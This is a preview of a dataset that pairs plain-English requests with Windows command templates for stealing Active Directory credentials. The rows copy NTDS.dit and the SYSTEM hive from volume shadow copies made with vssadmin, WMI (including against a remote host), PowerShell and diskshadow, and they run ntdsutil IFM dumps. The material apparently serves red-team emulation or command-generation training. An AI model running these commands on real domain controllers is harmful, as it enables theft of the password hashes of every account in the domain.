command stringclasses 140
values | instruction stringlengths 1 121 | result stringclasses 140
values |
|---|---|---|
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | Please use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | Please use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
wmic shadowcopy call create Volume=${drive_letter} | Please use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Please use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Please use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
diskshadow.exe /s ${filename} | Please use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | Please try to use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | Please try to use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
wmic shadowcopy call create Volume=${drive_letter} | Please try to use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Please try to use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Please try to use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
diskshadow.exe /s ${filename} | Please try to use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | I want a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | I want a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
wmic shadowcopy call create Volume=${drive_letter} | I want a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | I want a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | I want a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
diskshadow.exe /s ${filename} | I want a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | Give me a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | Give me a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
wmic shadowcopy call create Volume=${drive_letter} | Give me a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Give me a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Give me a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
diskshadow.exe /s ${filename} | Give me a command that will use vssadmin to create shadow copy | vssadmin.exe create shadow /for=${drive_letter} |
vssadmin.exe create shadow /for=${drive_letter} | Please try to copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | Please try to copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
wmic shadowcopy call create Volume=${drive_letter} | Please try to copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Please try to copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Please try to copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
diskshadow.exe /s ${filename} | Please try to copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
vssadmin.exe create shadow /for=${drive_letter} | Please copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | Please copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
wmic shadowcopy call create Volume=${drive_letter} | Please copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Please copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Please copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
diskshadow.exe /s ${filename} | Please copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
vssadmin.exe create shadow /for=${drive_letter} | I want a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | I want a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
wmic shadowcopy call create Volume=${drive_letter} | I want a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | I want a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | I want a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
diskshadow.exe /s ${filename} | I want a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
vssadmin.exe create shadow /for=${drive_letter} | Give me a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | Give me a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
wmic shadowcopy call create Volume=${drive_letter} | Give me a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Give me a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Give me a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
diskshadow.exe /s ${filename} | Give me a command that will copy NTDS.dit from Volume Shadow Copy | copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE |
vssadmin.exe create shadow /for=${drive_letter} | Please try to dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | Please try to dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic shadowcopy call create Volume=${drive_letter} | Please try to dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Please try to dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Please try to dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
diskshadow.exe /s ${filename} | Please try to dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
vssadmin.exe create shadow /for=${drive_letter} | Please try to dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | Please try to dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Please try to dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Please try to dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
diskshadow.exe /s ${filename} | Please try to dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
vssadmin.exe create shadow /for=${drive_letter} | Please dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic shadowcopy call create Volume=${drive_letter} | Please dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Please dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Please dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
diskshadow.exe /s ${filename} | Please dump Active Directory Database with NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
vssadmin.exe create shadow /for=${drive_letter} | Please dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | Please dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic shadowcopy call create Volume=${drive_letter} | Please dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Please dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Please dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
diskshadow.exe /s ${filename} | Please dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
vssadmin.exe create shadow /for=${drive_letter} | I want a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | I want a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic shadowcopy call create Volume=${drive_letter} | I want a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | I want a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | I want a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
diskshadow.exe /s ${filename} | I want a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
vssadmin.exe create shadow /for=${drive_letter} | Give me a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | Give me a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic shadowcopy call create Volume=${drive_letter} | Give me a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Give me a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Give me a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
diskshadow.exe /s ${filename} | Give me a command that will dump Active Directory Database via NTDSUtil | ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q |
vssadmin.exe create shadow /for=${drive_letter} | Please try to create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | Please try to create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | Please try to create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Please try to create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Please try to create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
diskshadow.exe /s ${filename} | Please try to create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
vssadmin.exe create shadow /for=${drive_letter} | Please create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | Please create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | Please create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | Please create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | Please create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
diskshadow.exe /s ${filename} | Please create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
vssadmin.exe create shadow /for=${drive_letter} | I want a command that will create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
copy ${vsc_name}\\Windows\\NTDS\\NTDS.dit ${extract_path}\\ntds.dit\ncopy ${vsc_name}\\Windows\\System32\\config\\SYSTEM ${extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM ${extract_path}\\SYSTEM_HIVE | I want a command that will create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
ntdsutil \"ac i ntds\" \"ifm\" \"create full ${output_folder}\" q q | I want a command that will create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
wmic /node:\"${target_host}\" shadowcopy call create Volume=${drive_letter} | I want a command that will create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
(gwmi -list win32_shadowcopy).Create('${drive_letter}','ClientAccessible') | I want a command that will create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
diskshadow.exe /s ${filename} | I want a command that will create Volume Shadow Copy with WMI | wmic shadowcopy call create Volume=${drive_letter} |
End of preview. Expand in Data Studio
README.md exists but content is empty.
- Downloads last month
- 8